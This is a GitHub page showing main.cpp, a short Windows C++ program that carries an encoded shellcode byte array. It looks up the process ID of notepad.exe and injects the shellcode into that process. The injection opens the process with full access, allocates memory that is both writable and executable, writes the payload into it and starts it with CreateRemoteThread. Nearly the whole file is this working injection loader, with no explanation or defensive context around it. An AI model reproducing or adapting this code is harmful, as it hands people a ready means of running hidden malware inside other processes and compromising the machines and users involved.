-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathmain.cpp
92 lines (79 loc) · 2.99 KB
/
main.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
# include <iostream>
# include <windows.h>
# include <TlHelp32.h>
using namespace std;
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\xd3\x63\xf0\x5c\xa2\xa7\x72\x95\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x2f\x2b\x73"
"\xb8\x52\x4f\xb2\x95\xd3\x63\xb1\x0d\xe3\xf7\x20\xc4\x85"
"\x2b\xc1\x8e\xc7\xef\xf9\xc7\xb3\x2b\x7b\x0e\xba\xef\xf9"
"\xc7\xf3\x2b\x7b\x2e\xf2\xef\x7d\x22\x99\x29\xbd\x6d\x6b"
"\xef\x43\x55\x7f\x5f\x91\x20\xa0\x8b\x52\xd4\x12\xaa\xfd"
"\x1d\xa3\x66\x90\x78\x81\x22\xa1\x14\x29\xf5\x52\x1e\x91"
"\x5f\xb8\x5d\x72\x2c\xf2\x1d\xd3\x63\xf0\x14\x27\x67\x06"
"\xf2\x9b\x62\x20\x0c\x29\xef\x6a\xd1\x58\x23\xd0\x15\xa3"
"\x77\x91\xc3\x9b\x9c\x39\x1d\x29\x93\xfa\xdd\xd2\xb5\xbd"
"\x6d\x6b\xef\x43\x55\x7f\x22\x31\x95\xaf\xe6\x73\x54\xeb"
"\x83\x85\xad\xee\xa4\x3e\xb1\xdb\x26\xc9\x8d\xd7\x7f\x2a"
"\xd1\x58\x23\xd4\x15\xa3\x77\x14\xd4\x58\x6f\xb8\x18\x29"
"\xe7\x6e\xdc\xd2\xb3\xb1\xd7\xa6\x2f\x3a\x94\x03\x22\xa8"
"\x1d\xfa\xf9\x2b\xcf\x92\x3b\xb1\x05\xe3\xfd\x3a\x16\x3f"
"\x43\xb1\x0e\x5d\x47\x2a\xd4\x8a\x39\xb8\xd7\xb0\x4e\x25"
"\x6a\x2c\x9c\xad\x14\x18\xa6\x72\x95\xd3\x63\xf0\x5c\xa2"
"\xef\xff\x18\xd2\x62\xf0\x5c\xe3\x1d\x43\x1e\xbc\xe4\x0f"
"\x89\x19\x57\xc7\x37\x85\x22\x4a\xfa\x37\x1a\xef\x6a\x06"
"\x2b\x73\x98\x8a\x9b\x74\xe9\xd9\xe3\x0b\xbc\xd7\xa2\xc9"
"\xd2\xc0\x11\x9f\x36\xa2\xfe\x33\x1c\x09\x9c\x25\x3f\xc3"
"\xcb\x11\xbb\xb6\x1b\x95\x5c\xa2\xa7\x72\x95";
DWORD EnumerateProcess(const wchar_t* targetProcess)
{
DWORD targetProcessID = 0;
HANDLE tHandle;
tHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (tHandle != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(tHandle, &pe32)) {
do {
if (wcscmp(targetProcess, pe32.szExeFile) == 0) {
targetProcessID = pe32.th32ProcessID;
break;
}
} while (Process32Next(tHandle, &pe32));
}
}
CloseHandle(tHandle);
return targetProcessID;
}
BOOL LoadShellcode(DWORD pid, LPVOID *shellcode, DWORD sc_size)
{
HANDLE pHandle, tHandle = NULL;
LPVOID rBuffer = NULL;
BOOL writeStatus = FALSE;
pHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid);
if (pHandle) {
rBuffer = VirtualAllocEx(pHandle, NULL, sc_size, (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
if (rBuffer != NULL) {
writeStatus = WriteProcessMemory(pHandle, rBuffer, shellcode, sc_size, NULL);
}
if (writeStatus) {
tHandle = CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, NULL);
}
if (tHandle == NULL) {
VirtualFreeEx(tHandle, rBuffer, 0, MEM_RELEASE);
return EXIT_FAILURE;
}
WaitForSingleObject(tHandle, INFINITE);
CloseHandle(pHandle);
CloseHandle(tHandle);
}
return EXIT_SUCCESS;
}
int main(int argc, char* argv[])
{
const wchar_t *targetProcess = L"notepad.exe";
DWORD pid = EnumerateProcess(targetProcess);
LoadShellcode(pid, (LPVOID *)&buf, sizeof(buf));
return 0;
}